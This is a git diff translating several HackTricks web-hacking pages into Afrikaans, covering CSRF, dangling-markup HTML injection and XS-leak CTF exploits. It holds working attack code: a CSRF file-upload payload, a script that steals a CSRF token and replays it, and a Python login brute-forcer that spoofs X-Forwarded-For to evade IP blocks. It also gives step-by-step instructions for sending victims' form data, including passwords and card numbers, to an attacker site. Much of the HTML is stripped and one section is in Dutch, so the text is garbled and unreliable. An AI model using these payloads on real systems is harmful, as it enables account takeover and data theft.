+'n multipart/form-data POS-aanvraag word gebruik om data na 'n bediener te stuur deur die gebruik van die HTTP POST-metode. Hierdie tipe aanvraag word dikwels gebruik wanneer daar lêers of ander nie-tekstuele data gestuur moet word.
 
+Die aanvraag se inhoud word verdeel in verskillende dele, elk met 'n eie inhoudstipe en inhoud. Elke deel bevat 'n sleutel-waarde-paar, waar die sleutel die naam van die vormveld is en die waarde die inhoud van die veld is.
+
+Die inhoudstipe van die aanvraag is "multipart/form-data" en die inhoudsopbou word aangedui deur die "boundary" parameter. Die "boundary" parameter is 'n unieke tekenreeks wat gebruik word om die grense tussen die verskillende dele van die aanvraag aan te dui.
+
+Byvoorbeeld, 'n multipart/form-data POS-aanvraag kan gebruik word om 'n lêer na 'n bediener te stuur. Die lêer sal as 'n deel van die aanvraag ingesluit word, met die sleutel as die naam van die vormveld en die waarde as die inhoud van die lêer.
+
+Dit is belangrik om te weet dat 'n CSRF-aanval (Cross-Site Request Forgery) moontlik is met 'n multipart/form-data POS-aanvraag. In 'n CSRF-aanval kan 'n aanvaller 'n vervalste aanvraag stuur namens 'n ingelogde gebruiker, wat kan lei tot ongewenste aksies of datalekke.
 ```javascript
 myFormData = new FormData();
 var blob = new Blob([""], { type: "text/text"});
 myFormData.append("newAttachment", blob, "pwned.php");
 fetch("http://example/some/path", {
-    method: "post",
-    body: myFormData,
-    credentials: "include",
-    headers: {"Content-Type": "application/x-www-form-urlencoded"},
-    mode: "no-cors"
+method: "post",
+body: myFormData,
+credentials: "include",
+headers: {"Content-Type": "application/x-www-form-urlencoded"},
+mode: "no-cors"
 });
 ```
-
-### multipart/form-data POST request v2
-
+### multipart/form-data POST versoek v2
 ```javascript
 // https://www.exploit-db.com/exploits/20009
 var fileSize = fileData.length,
@@ -361,9 +406,15 @@ body += "--" + boundary + "--";
 //xhr.send(body);
 xhr.sendAsBinary(body);
 ```
+### Vorm POST-aanvraag van binne 'n iframe
 
-### Form POST request from within an iframe
+Wanneer 'n webbladsy 'n vorm bevat wat 'n POST-aanvraag na 'n ander webbladsy stuur, kan hierdie vorm ook binne 'n iframe geplaas word. Dit beteken dat die vorm onsigbaar kan wees vir die gebruiker terwyl dit steeds agter die skerms data na 'n ander webbladsy stuur.
 
+Hierdie tegniek kan gebruik word vir 'n CSRF-aanval (Cross-Site Request Forgery). Die aanvaller kan 'n webbladsy skep wat 'n vorm bevat wat agter die skerms data na 'n ander webbladsy stuur sonder dat die gebruiker daarvan bewus is. As die gebruiker toevallig die aanvallige webbladsy besoek terwyl hy aangemeld is by die teikenwebwerf, sal die vormaansoek uitgevoer word met die legitimasie van die gebruiker. Dit kan die aanvaller in staat stel om aksies namens die gebruiker uit te voer sonder sy toestemming.
+
+Om hierdie tipe aanval te voorkom, kan die teikenwebwerf CSRF-beskerming implementeer deur gebruik te maak van tokens. Hierdie tokens word gegenereer en aan die vorm toegevoeg. Wanneer die vormaansoek ontvang word, word die token geverifieer om te verseker dat dit geldig is en dat die aansoek nie deur 'n aanvaller gestuur is nie.
+
+Dit is belangrik vir webontwikkelaars om bewus te wees van hierdie tegniek en om toepaslike veiligheidsmaatreëls te implementeer om CSRF-aanvalle te voorkom.
 ```html
 <--! expl.html -->
 
@@ -381,58 +432,90 @@ function envia(){document.getElementById("formulario").submit();}
 
 
Sitio bajo mantenimiento. Disculpe las molestias

 ```
+### **Steel CSRF-token en stuur 'n POST-versoek**
 
-### **Steal CSRF Token and send a POST request**
+Om 'n CSRF-token te steel en 'n POST-versoek te stuur, kan jy die volgende stappe volg:
 
+1. Identifiseer die doelwit-webwerf waarop jy wil inbreek.
+2. Analiseer die webwerf se bronkode om die CSRF-token te vind. Die token is gewoonlik ingesluit in 'n versteekte veld of as 'n koekie.
+3. Skryf 'n skripsie of gebruik 'n hulpmiddel soos 'n webkrapper om die CSRF-token te onttrek.
+4. Stel 'n POST-versoek op met die gesteelde CSRF-token en die nodige parameters vir die aangevraagde aksie.
+5. Stuur die POST-versoek na die doelwit-webwerf se bedienaar.
+6. Monitor die respons om te sien of die aangevraagde aksie suksesvol uitgevoer is.
+
+Dit is belangrik om te onthou dat die gebruik van CSRF-tegnieke om ongemagtigde aksies uit te voer teen 'n webwerf onwettig is en etiese implikasies het. Hierdie tegnieke moet slegs gebruik word vir wettige doeleindes, soos om sekuriteitslekke in 'n webwerf te identifiseer en te verhelp.
 ```javascript
 function submitFormWithTokenJS(token) {
-    var xhr = new XMLHttpRequest();
-    xhr.open("POST", POST_URL, true);
-    xhr.withCredentials = true;
+var xhr = new XMLHttpRequest();
+xhr.open("POST", POST_URL, true);
+xhr.withCredentials = true;
 
-    // Send the proper header information along with the request
-    xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
+// Send the proper header information along with the request
+xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
 
-    // This is for debugging and can be removed
-    xhr.onreadystatechange = function() {
-        if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
-            //console.log(xhr.responseText);
-        }
-    }
+// This is for debugging and can be removed
+xhr.onreadystatechange = function() {
+if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
+//console.log(xhr.responseText);
+}
+}
 
-    xhr.send("token=" + token + "&otherparama=heyyyy");
+xhr.send("token=" + token + "&otherparama=heyyyy");
 }
 
 function getTokenJS() {
-    var xhr = new XMLHttpRequest();
-    // This tels it to return it as a HTML document
-    xhr.responseType = "document";
-    xhr.withCredentials = true;
-    // true on the end of here makes the call asynchronous
-    xhr.open("GET", GET_URL, true);
-    xhr.onload = function (e) {
-        if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
-            // Get the document from the response
-            page = xhr.response
-            // Get the input element
-            input = page.getElementById("token");
-            // Show the token
-            //console.log("The token is: " + input.value);
-            // Use the token to submit the form
-            submitFormWithTokenJS(input.value);
-        }
-    };
-    // Make the request
-    xhr.send(null);
+var xhr = new XMLHttpRequest();
+// This tels it to return it as a HTML document
+xhr.responseType = "document";
+xhr.withCredentials = true;
+// true on the end of here makes the call asynchronous
+xhr.open("GET", GET_URL, true);
+xhr.onload = function (e) {
+if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
+// Get the document from the response
+page = xhr.response
+// Get the input element
+input = page.getElementById("token");
+// Show the token
+//console.log("The token is: " + input.value);
+// Use the token to submit the form
+submitFormWithTokenJS(input.value);
+}
+};
+// Make the request
+xhr.send(null);
 }
 
 var GET_URL="http://google.com?param=VALUE"
 var POST_URL="http://google.com?param=VALUE"
 getTokenJS();
 ```
+### **Steel CSRF-token en stuur 'n Post-aanvraag deur gebruik te maak van 'n iframe, 'n vorm en Ajax**
 
-### **Steal CSRF Token and send a Post request using an iframe, a form and Ajax**
+Om 'n CSRF-token te steel en 'n Post-aanvraag te stuur, kan jy die volgende metodes gebruik: 'n iframe, 'n vorm en Ajax.
 
+#### **Metode 1: iframe**
+
+1. Skep 'n iframe-element in die HTML-kode van jou aanvalspagina.
+2. Stel die bron van die iframe in op die doelwebwerf se URL waar die CSRF-token gegenereer word.
+3. Gebruik JavaScript om die CSRF-token van die iframe-element te kry.
+4. Stuur 'n Post-aanvraag na die doelwebwerf deur die CSRF-token as 'n parameter in te sluit.
+
+#### **Metode 2: vorm**
+
+1. Skep 'n vorm-element in die HTML-kode van jou aanvalspagina.
+2. Stel die aksie van die vorm in op die doelwebwerf se URL waar die CSRF-token gegenereer word.
+3. Voeg 'n verborge veld by in die vorm met die naam en waarde van die CSRF-token.
+4. Stuur die vorm na die doelwebwerf deur dit te indien.
+
+#### **Metode 3: Ajax**
+
+1. Gebruik JavaScript om 'n Ajax-aanvraag na die doelwebwerf te stuur.
+2. Stel die metode van die aanvraag in op Post.
+3. Voeg die CSRF-token as 'n parameter by in die aanvraagdata.
+4. Stuur die Ajax-aanvraag na die doelwebwerf.
+
+Deur een van hierdie metodes te gebruik, kan jy 'n CSRF-token steel en dit gebruik om 'n Post-aanvraag na die doelwebwerf te stuur. Onthou egter dat hierdie metodes vir aanvalle gebruik kan word en dat dit belangrik is om etiese hackingpraktyke te volg.
 ```html
 

 
@@ -442,100 +525,167 @@ getTokenJS();
 
  
+
 
 ```
+### **Steel CSRF-token en stuur 'n POST-aanvraag deur gebruik te maak van 'n iframe en 'n vorm**
 
-### **Steal CSRF Token and sen a POST request using an iframe and a form**
+Om 'n CSRF-token te steel en 'n POST-aanvraag te stuur, kan jy die volgende metode gebruik:
 
+1. Skep 'n iframe-element in die HTML-kode van jou aanvalswebwerf. Die iframe-element moet verwys na die doelwitwebwerf waarop jy die POST-aanvraag wil uitvoer.
+
+   ```html
+   
+   ```
+
+2. Skep 'n vorm-element binne die iframe-element. Die vorm moet die nodige veldwaardes bevat vir die POST-aanvraag wat jy wil uitvoer. Dit moet ook 'n verborge veld hê wat die gesteelde CSRF-token bevat.
+
+   ```html
+   
+       
+       
+   

+   ```
+
+3. Gebruik JavaScript om die vorm binne die iframe te stuur sodra die iframe gelaai is. Hierdie stap verseker dat die POST-aanvraag outomaties uitgevoer word sonder enige interaksie van die gebruiker.
+
+   ```html
+   
+   ```
+
+Met hierdie metode sal die gesteelde CSRF-token gebruik word om 'n POST-aanvraag na die doelwitwebwerf te stuur sonder dat die gebruiker daarvan bewus is. Dit kan gebruik word om skadelike aksies uit te voer namens die gebruiker, soos die verander van wagwoorde of die stuur van valse inligting.
 ```html
 
 
-
 ```
+### **Steel token en stuur dit deur gebruik te maak van 2 iframes**
 
-### **Steal token and send it using 2 iframes**
+Om een CSRF-aanval (Cross-Site Request Forgery) uit te voeren, moet je eerst het CSRF-token stelen van het doelwit. Dit token wordt meestal opgeslagen in een cookie of een verborgen veld in een formulier. Nadat je het token hebt verkregen, kun je het gebruiken om een vervalste aanvraag naar de doelwebsite te sturen.
 
+Een manier om het gestolen token te verzenden, is door gebruik te maken van twee iframes. Het eerste iframe wordt gebruikt om het CSRF-formulier te laden, terwijl het tweede iframe wordt gebruikt om de vervalste aanvraag te verzenden.
+
+Hier is een voorbeeld van hoe je dit kunt doen:
+
+```html
+
+
+
+
+```
+
+In dit voorbeeld wordt ervan uitgegaan dat het CSRF-formulier wordt geladen vanaf `https://www.example.com/csrf-form` en het vervalste verzoek wordt verzonden naar `https://www.example.com/submit`. Zorg ervoor dat je de juiste URL's gebruikt voor jouw specifieke doelwit.
+
+Merk op dat deze techniek mogelijk niet werkt als de doelwebsite maatregelen heeft genomen om CSRF-aanvallen te voorkomen, zoals het gebruik van anti-CSRF-tokens die per sessie veranderen. Het is belangrijk om altijd de beveiligingsmaatregelen van het doelwit te evalueren voordat je een CSRF-aanval uitvoert.
 ```html
 
 
-
 
-
 
 

-  
-          
-  
-  
+
+
+
+
 

 ```
-
-### **POSTSteal CSRF token with Ajax and send a post with a form**
-
+### **POSTSteel CSRF-token met Ajax en stuur 'n pos met 'n vorm**
 ```html
 
 
 

-  
-  
-  
-  
+
+
+
+
 

 
 
 ```
+### CSRF met Socket.IO
 
-### CSRF with Socket.IO
+Socket.IO is 'n JavaScript-biblioteek wat gebruik word vir die ontwikkeling van real-time toepassings. Dit maak gebruik van WebSockets om 'n permanente verbinding tussen die bediener en die kliënt te skep. Hierdie permanente verbinding kan egter 'n veiligheidsrisiko inhou, veral as dit nie behoorlik beskerm word teen Cross-Site Request Forgery (CSRF) aanvalle nie.
 
+CSRF is 'n aanvalstegniek waar 'n aanvaller 'n kliënt se vertroue in 'n webtoepassing misbruik om ongewenste aksies namens die kliënt uit te voer. Met Socket.IO kan 'n CSRF-aanval plaasvind deur 'n kwaadwillige webwerf te skep wat 'n Socket.IO-verbinding met die doelwitwebwerf tot stand bring. As die kliënt reeds 'n geldige sessie het met die doelwitwebwerf, sal die Socket.IO-verbinding ook geldig wees. Die kwaadwillige webwerf kan dan gebruik maak van die Socket.IO-verbinding om ongewenste aksies uit te voer namens die kliënt.
+
+Om Socket.IO te beskerm teen CSRF-aanvalle, kan die volgende maatreëls geneem word:
+
+1. **Verifikasie van oorsprong**: Die doelwitwebwerf kan die oorsprong van inkomende Socket.IO-verbindings verifieer om te verseker dat dit afkomstig is van 'n vertroude bron. Dit kan gedoen word deur die `origin`-veld in die HTTP-kop van die inkomende verbindingsversoek te ontleed en te vergelyk met 'n lys vertroude oorspronge.
+
+2. **Gebruik van CSRF-token**: Die doelwitwebwerf kan 'n CSRF-token genereer en dit aan die kliënt stuur as 'n koekie of deel van die Socket.IO-verbindingsversoek. Die kliënt moet dan die CSRF-token insluit in elke Socket.IO-verbindingsversoek. Die doelwitwebwerf kan die ontvangste CSRF-token vergelyk met die verwagte waarde om te verseker dat die versoek geldig is.
+
+3. **Verifikasie van sessie**: Die doelwitwebwerf kan die sessie van die kliënt verifieer voordat dit enige aksies toelaat wat deur die Socket.IO-verbinding uitgevoer word. Dit kan gedoen word deur die sessie-identifiseerder te vergelyk wat in die Socket.IO-verbindingsversoek gestuur word met die sessie-identifiseerder wat geassosieer word met die kliënt se sessie.
+
+Deur hierdie maatreëls te implementeer, kan die risiko van CSRF-aanvalle met Socket.IO verminder word en die veiligheid van die webtoepassing verhoog word.
 ```html
 
 
 ```
-
 ## CSRF Login Brute Force
 
-The code can be used to Brut Force a login form using a CSRF token (It's also using the header X-Forwarded-For to try to bypass a possible IP blacklisting):
-
+Die kode kan gebruik word om 'n login-vorm te Brut Force met behulp van 'n CSRF-token (Dit maak ook gebruik van die X-Forwarded-For-kop om te probeer om 'n moontlike IP-swartlys te omseil):
 ```python
 import request
 import re
@@ -573,44 +721,43 @@ USER = "fergus"
 PASS_LIST="./words"
 
 def init_session():
-    #Return CSRF + Session (cookie)
-    r = requests.get(URL)
-    csrf = re.search(r'input type="hidden" id="jstokenCSRF" name="tokenCSRF" value="([a-zA-Z0-9]*)"', r.text)
-    csrf = csrf.group(1)
-    session_cookie = r.cookies.get(SESSION_COOKIE_NAME)
-    return csrf, session_cookie
+#Return CSRF + Session (cookie)
+r = requests.get(URL)
+csrf = re.search(r'input type="hidden" id="jstokenCSRF" name="tokenCSRF" value="([a-zA-Z0-9]*)"', r.text)
+csrf = csrf.group(1)
+session_cookie = r.cookies.get(SESSION_COOKIE_NAME)
+return csrf, session_cookie
 
 def login(user, password):
-    print(f"{user}:{password}")
-    csrf, cookie = init_session()
-    cookies = {SESSION_COOKIE_NAME: cookie}
-    data = {
-        "tokenCSRF": csrf,
-        "username": user,
-        "password": password,
-        "save": ""
-    }
-    headers = {
-        "X-Forwarded-For": f"{random.randint(1,256)}.{random.randint(1,256)}.{random.randint(1,256)}.{random.randint(1,256)}"
-    }
-    r = requests.post(URL, data=data, cookies=cookies, headers=headers, proxies=PROXY)
-    if "Username or password incorrect" in r.text:
-        return False
-    else:
-        print(f"FOUND {user} : {password}")
-        return True
+print(f"{user}:{password}")
+csrf, cookie = init_session()
+cookies = {SESSION_COOKIE_NAME: cookie}
+data = {
+"tokenCSRF": csrf,
+"username": user,
+"password": password,
+"save": ""
+}
+headers = {
+"X-Forwarded-For": f"{random.randint(1,256)}.{random.randint(1,256)}.{random.randint(1,256)}.{random.randint(1,256)}"
+}
+r = requests.post(URL, data=data, cookies=cookies, headers=headers, proxies=PROXY)
+if "Username or password incorrect" in r.text:
+return False
+else:
+print(f"FOUND {user} : {password}")
+return True
 
 with open(PASS_LIST, "r") as f:
-    for line in f:
-        login(USER, line.strip())
+for line in f:
+login(USER, line.strip())
 ```
-
-## Tools 
+## Gereedskap 
 
 * [https://github.com/0xInfection/XSRFProbe](https://github.com/0xInfection/XSRFProbe)
 * [https://github.com/merttasci/csrf-poc-generator](https://github.com/merttasci/csrf-poc-generator)
 
-## References
+## Verwysings
 
 * [https://portswigger.net/web-security/csrf](https://portswigger.net/web-security/csrf)
 * [https://portswigger.net/web-security/csrf/bypassing-token-validation](https://portswigger.net/web-security/csrf/bypassing-token-validation)
@@ -621,29 +768,29 @@ with open(PASS_LIST, "r") as f:
 
 

 
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
+Sluit aan by [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en foutbeloningsjagters!
 
 **Hacking Insights**\
-Engage with content that delves into the thrill and challenges of hacking
+Gaan in gesprek met inhoud wat die opwinding en uitdagings van hacking ondersoek
 
 **Real-Time Hack News**\
-Keep up-to-date with fast-paced hacking world through real-time news and insights
+Bly op hoogte van die vinnige wêreld van hacking deur middel van real-time nuus en insigte
 
-**Latest Announcements**\
-Stay informed with the newest bug bounties launching and crucial platform updates
+**Nuutste Aankondigings**\
+Bly ingelig met die nuutste foutbelonings wat bekendgestel word en noodsaaklike platform-opdaterings
 
-**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
+**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers!
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat** Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
 
 

diff --git a/pentesting-web/dangling-markup-html-scriptless-injection/README.md b/pentesting-web/dangling-markup-html-scriptless-injection/README.md
index 9481c0842..05d036800 100644
--- a/pentesting-web/dangling-markup-html-scriptless-injection/README.md
+++ b/pentesting-web/dangling-markup-html-scriptless-injection/README.md
@@ -1,108 +1,111 @@
-# Dangling Markup - HTML scriptless injection
+# Hangende Markup - HTML skriptlose inspuiting
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
 
 

 
-## Resume
+## Opsomming
 
-This technique can be use to extract information from a user when an **HTML injection is found**. This is very useful if you **don't find any way to exploit a** [**XSS** ](../xss-cross-site-scripting/)but you can **inject some HTML tags**.\
-It is also useful if some **secret is saved in clear text** in the HTML and you want to **exfiltrate** it from the client, or if you want to mislead some script execution.
+Hierdie tegniek kan gebruik word om inligting van 'n gebruiker te onttrek wanneer 'n **HTML-inspuiting gevind word**. Dit is baie nuttig as jy **nie 'n manier vind om 'n** [**XSS** ](../xss-cross-site-scripting/)te benut nie, maar jy kan **'n paar HTML-etikette inspuit**.\
+Dit is ook nuttig as 'n **geheim in die HTML in duidelike teks bewaar word** en jy dit van die klient wil **uitvoer** of as jy 'n skripsie-uitvoering wil mislei.
 
-Several techniques commented here can be used to bypass some [**Content Security Policy**](../content-security-policy-csp-bypass/) by exfiltrating information in unexpected ways (html tags, CSS, http-meta tags, forms, base...).
+Verskeie tegnieke wat hier bespreek word, kan gebruik word om sekere [**Content Security Policy**](../content-security-policy-csp-bypass/) te omseil deur inligting op onverwagte maniere uit te voer (html-etikette, CSS, http-meta-etikette, vorms, basis...).
 
-## Main Applications
+## Hooftoepassings
 
-### Stealing clear text secrets
+### Steel duidelike teksgeheime
 
-If you inject `@import//hackvertor.co.uk?     <--- Injected
 steal me!;
 ```
-
-You could also use **`test
 ```
+### Steel vorms
 
-### Stealing forms
+Hierdie tegniek maak gebruik van 'n kwesbaarheid genaamd "dangling markup" om vorminligting te steel van 'n webwerf. 'n Dangling markup verwys na HTML-kode wat nie korrek gekoppel is aan die res van die webwerf nie, maar steeds deur die webblaaier geïnterpreteer word.
 
+Om vorminligting te steel, moet jy eers 'n vorm op die teikenwebwerf vind wat voldoen aan die volgende vereistes:
+
+- Die vorm moet 'n aksie-attribuut hê wat verwys na 'n eksterne webwerf of 'n ander domein.
+- Die vorm moet 'n metode-attribuut hê wat ingestel is op "GET" of "POST".
+- Die vorm moet 'n invoerveld hê wat geheime inligting bevat, soos 'n wagwoord of 'n kredietkaartnommer.
+
+As jy so 'n vorm vind, kan jy 'n aangepaste HTML-kode skep wat die vorminligting na jou eie webwerf stuur. Hier is die stappe wat jy kan volg:
+
+1. Skep 'n nuwe HTML-dokument met die aangepaste kode.
+2. Stel die aksie-attribuut van die vorm in op jou eie webwerf se URL.
+3. Stel die metode-attribuut van die vorm in op "POST" of "GET", afhangende van die oorspronklike vorm.
+4. Voeg 'n invoerveld by wat die geheime inligting sal ontvang.
+5. Stuur die aangepaste kode na die teikenwebwerf deur dit in te sluit in 'n kwesbare plek, soos 'n kommentaarveld of 'n onsigbare element.
+
+As 'n gebruiker die webwerf besoek en die vorm invul, sal die inligting na jou eie webwerf gestuur word in plaas van na die beoogde bestemming. Hierdie tegniek kan gebruik word om gevoelige inligting soos wagwoorde en kredietkaartnommers te steel.
+
+Dit is belangrik om te onthou dat die gebruik van hierdie tegniek onwettig is sonder toestemming van die eienaar van die teikenwebwerf. Dit word sterk aanbeveel om slegs etiese hacking-tegnieke te gebruik en om altyd die toepaslike wette en regulasies te volg.
 ```html
 
 ```
+Dan, die vorms wat data na 'n pad stuur (soos `
`) sal die data na die skadelike domein stuur.
 
-Then, the forms that send data to path (like ``) will send the data to the malicious domain.
+### Steel vorms 2
 
-### Stealing forms 2
+Stel 'n vormkop: `` dit sal die volgende vormkop oorskryf en al die data van die vorm sal na die aanvaller gestuur word.
 
-Set a form header: `` this will overwrite the next form header and all the data from the form will be sent to the attacker.
-
-### Stealing forms 3
-
-The button can change the URL where the information of the form is going to be sent with the attribute "formaction":
+### Steel vorms 3
 
+Die knoppie kan die URL waar die inligting van die vorm gestuur gaan word, verander met die atribuut "formaction":
 ```html
 

-  

-    
-  

+
+

+
+

 
-  

-    
-  

-  
+let t = 0
+const round = 30
+setTimeout(async () => {
+for(let i=0; i1)
+let end = performance.now()
+t += end - s
+console.log(end - s)
+}
+const avg = t/round
+send(str + "," + t + "," + "avg:" + avg)
+
+/*
+I get this threshold(1000ms) by trying multiple times on remote admin bot
+for example, A takes 1500ms, Z takes 700ms, so I choose 1000 ms as a threshold
+*/
+const isFound = (t >= 1000)
+if (isFound) {
+inp2.value = "0"
+} else {
+inp2.value = "1"
+}
+
+// remember to delete the post to not break our leak oracle
+f2.submit()
+setTimeout(() => {
+resolve(isFound)
+}, 200)
+}, 200)
+}
+
+
 
 
 
 
 ```
+## DiceCTF 2022 - wortel
 
-## DiceCTF 2022 - carrot
+In hierdie geval was die eerste stap van die uitbuiting om 'n CSRF te misbruik om die bladsy waar die vlag bevat word te wysig sodat dit **veel meer inhoud** het (en dit neem dus langer om te laai), en dan **die verbindingspoel misbruik om die tyd te meet wat dit neem om toegang tot die bladsy te verkry** wat moontlik die vlag kan bevat.
 
-In this case the first step of the exploit was to abuse a CSRF to modify the page where the flag is contained so it has **much more content** (and therefore loading it takes more time), and then **abuse the connection pool to measure the time it takes to access the page** that could be potentially having the flag.
-
-In the exploit you can see:
-
-* Abuse CSRF
-* Occupy all the sockets but 1
-* Calibrate the response
-* Start bruteforcing by accessing the potential page with the flag
-  * The potential page will be accessed and immediately an attackers controlled URL will also be accessed to check how much time both requests take.
+In die uitbuiting kan jy sien:
 
+* Misbruik CSRF
+* Beset al die sokkels behalwe een
+* Kalibreer die respons
+* Begin bruteforce deur toegang te verkry tot die potensiële bladsy met die vlag
+* Die potensiële bladsy sal toegang verkry word en onmiddellik sal 'n aanvallersbeheerde URL ook toegang verkry word om te kyk hoeveel tyd beide versoek neem.
 ```html
 
DiceCTF 2022 web/carrot

 
@@ -326,13 +321,13 @@ In the exploit you can see:
 

 

 
 
 
 ```
-
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

diff --git a/pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.md b/pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.md
index 999601fab..0bdb44066 100644
--- a/pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.md
+++ b/pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.md
@@ -1,82 +1,74 @@
-# Cookie Bomb + Onerror XS Leak
+# Koekiebom + Onerror XS-lek
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
